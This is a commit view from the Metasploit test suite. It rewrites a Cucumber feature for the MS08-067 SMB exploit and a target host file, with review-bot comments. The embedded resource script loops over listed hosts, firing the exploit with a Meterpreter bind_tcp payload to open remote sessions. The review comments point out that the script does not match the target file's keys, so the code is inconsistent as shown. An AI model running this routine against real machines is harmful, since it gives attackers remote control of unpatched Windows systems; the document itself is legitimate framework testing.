Commit
Merge branch 'jbarnett-r7-feature/MS-833/ms08-067-automation' into upstream-master
Showing 6 changed files with 38 additions and 185 deletions.
@@ -1,181 +1,27 @@ | ||
@wip | ||
@targets @db | ||
Feature: MS08-067 netapi | ||
|
||
Background: | ||
Given a directory named "home" | ||
And I cd to "home" | ||
And a mocked home directory | ||
Given I run `msfconsole` interactively | ||
And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp" | ||
|
||
Scenario: The MS08-067 Module should have the following options | ||
When I type "use exploit/windows/smb/ms08_067_netapi" | ||
And I type "show options" | ||
And I type "exit" | ||
Then the output should contain: | ||
Scenario: The MS08-067 should get a session with bind_tcp | ||
Given I ready the windows targets | ||
Given a file named "ms08-067-bind.rc" with: | ||
""" | ||
Module options (exploit/windows/smb/ms08_067_netapi): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
RHOST yes The target address | ||
RPORT 445 yes Set the SMB service port | ||
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) | ||
Exploit target: | ||
Id Name | ||
-- ---- | ||
0 Automatic Targeting | ||
<ruby> | ||
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') | ||
self.run_single('use exploit/windows/smb/ms08_067_netapi') | ||
self.run_single('set payload windows/meterpreter/bind_tcp') | ||
hosts.each do |host| | ||
self.run_single("set RHOST #{host['ipAddress']}") | ||
self.run_single('run -j') | ||
sleep 1 | ||
end | ||
self.run_single('sessions -K') | ||
</ruby> | ||
""" | ||
|
||
Scenario: The MS08-067 Module should have the following advanced options | ||
When I type "use exploit/windows/smb/ms08_067_netapi" | ||
And I type "show advanced" | ||
And I type "exit" | ||
Then the output should contain: | ||
""" | ||
Module advanced options: | ||
Name : CHOST | ||
Current Setting: | ||
Description : The local client address | ||
Name : CPORT | ||
Current Setting: | ||
Description : The local client port | ||
Name : ConnectTimeout | ||
Current Setting: 10 | ||
Description : Maximum number of seconds to establish a TCP connection | ||
Name : ContextInformationFile | ||
Current Setting: | ||
Description : The information file that contains context information | ||
Name : DCERPC::ReadTimeout | ||
Current Setting: 10 | ||
Description : The number of seconds to wait for DCERPC responses | ||
Name : DisablePayloadHandler | ||
Current Setting: false | ||
Description : Disable the handler code for the selected payload | ||
Name : EnableContextEncoding | ||
Current Setting: false | ||
Description : Use transient context when encoding payloads | ||
Name : NTLM::SendLM | ||
Current Setting: true | ||
Description : Always send the LANMAN response (except when NTLMv2_session is | ||
specified) | ||
Name : NTLM::SendNTLM | ||
Current Setting: true | ||
Description : Activate the 'Negotiate NTLM key' flag, indicating the use of | ||
NTLM responses | ||
Name : NTLM::SendSPN | ||
Current Setting: true | ||
Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow | ||
authentification on windows Seven/2008r2 when SPN is required | ||
Name : NTLM::UseLMKey | ||
Current Setting: false | ||
Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key | ||
when the LM response is sent | ||
Name : NTLM::UseNTLM2_session | ||
Current Setting: true | ||
Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a | ||
NTLMv2_session | ||
Name : NTLM::UseNTLMv2 | ||
Current Setting: true | ||
Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key | ||
is true | ||
Name : Proxies | ||
Current Setting: | ||
Description : A proxy chain of format type:host:port[,type:host:port][...] | ||
Name : SMB::ChunkSize | ||
Current Setting: 500 | ||
Description : The chunk size for SMB segments, bigger values will increase | ||
speed but break NT 4.0 and SMB signing | ||
Name : SMB::Native_LM | ||
Current Setting: Windows 2000 5.0 | ||
Description : The Native LM to send during authentication | ||
Name : SMB::Native_OS | ||
Current Setting: Windows 2000 2195 | ||
Description : The Native OS to send during authentication | ||
Name : SMB::VerifySignature | ||
Current Setting: false | ||
Description : Enforces client-side verification of server response signatures | ||
Name : SMBDirect | ||
Current Setting: true | ||
Description : The target port is a raw SMB service (not NetBIOS) | ||
Name : SMBDomain | ||
Current Setting: . | ||
Description : The Windows domain to use for authentication | ||
Name : SMBName | ||
Current Setting: *SMBSERVER | ||
Description : The NetBIOS hostname (required for port 139 connections) | ||
Name : SMBPass | ||
Current Setting: | ||
Description : The password for the specified username | ||
Name : SMBUser | ||
Current Setting: | ||
Description : The username to authenticate as | ||
Name : SSL | ||
Current Setting: false | ||
Description : Negotiate SSL for outgoing connections | ||
Name : SSLCipher | ||
Current Setting: | ||
Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" | ||
Name : SSLVerifyMode | ||
Current Setting: PEER | ||
Description : SSL verification method (Accepted: CLIENT_ONCE, | ||
FAIL_IF_NO_PEER_CERT, NONE, PEER) | ||
Name : SSLVersion | ||
Current Setting: SSL3 | ||
Description : Specify the version of SSL that should be used (Accepted: SSL2, | ||
SSL3, TLS1) | ||
Name : VERBOSE | ||
Current Setting: false | ||
Description : Enable detailed status messages | ||
Name : WORKSPACE | ||
Current Setting: | ||
Description : Specify the workspace for this module | ||
Name : WfsDelay | ||
Current Setting: 0 | ||
Description : Additional delay when waiting for a session | ||
""" | ||
|
||
@targets | ||
Scenario: Show RHOST/etc variable expansion from a config file | ||
When I type "use exploit/windows/smb/ms08_067_netapi" | ||
When RHOST is WINDOWS | ||
And I type "set PAYLOAD windows/meterpreter/bind_tcp" | ||
And I type "show options" | ||
And I type "run" | ||
And I type "exit" | ||
And I type "exit" | ||
Then the output should match /spider-wxp/ | ||
When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` | ||
Then the 'Mdm::Host' table contains the expected targets | ||
|
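Review bot: the embedded `ms08-067-bind.rc` script iterates the loaded YAML with `hosts.each do |host|` and reads `host['ipAddress']`, but the YAML file changed in the second hunk of this commit (which appears to be the `targets.yml` this script loads) is a mapping whose top-level key is `windows` and whose entries use `ip`, not `ipAddress`; iterating a Hash with `each` yields `[key, value]` pairs, so `host['ipAddress']` would raise a TypeError instead of setting RHOST. Suggest `hosts['windows'].each do |host|` together with `set RHOST #{host['ip']}` (or rename the YAML key to match). Two smaller points: `sleep 1` between `run -j` and `sessions -K` is a race, since the backgrounded job may not have produced a session yet when it is killed, and the `@wip` tag at the top of the feature still applies to the whole file, so the new `bind_tcp` scenario will be filtered out of a normal run unless that tag is dropped or moved.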
This file was deleted.
@@ -1,2 +1,7 @@ | ||
WINDOWS: spider-wxp.vuln.lax.rapid7.com | ||
LINUX: spider-ubuntu.vuln.lax.rapid7.com | ||
windows: | ||
- | ||
hostname: wxpsp0 | ||
ip: 127.0.0.100 | ||
- | ||
hostname: wxpsp2 | ||
ip: 127.0.0.101 |
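Review bot: the new `windows:` schema (`hostname`/`ip` entries) does not match its consumers in this same commit: the feature file still has the step `When RHOST is WINDOWS`, which expects the removed `WINDOWS:` key, and its resource script reads `host['ipAddress']` rather than `ip`. Either keep a `WINDOWS` entry for the config-file expansion scenario or update those steps in the same change so the suite is consistent. The `LINUX` target is also dropped with no replacement, and the loopback addresses 127.0.0.100/127.0.0.101 paired with hostnames `wxpsp0`/`wxpsp2` look like placeholders; if so, a comment in the file saying which real hosts they stand in for would help the next reader.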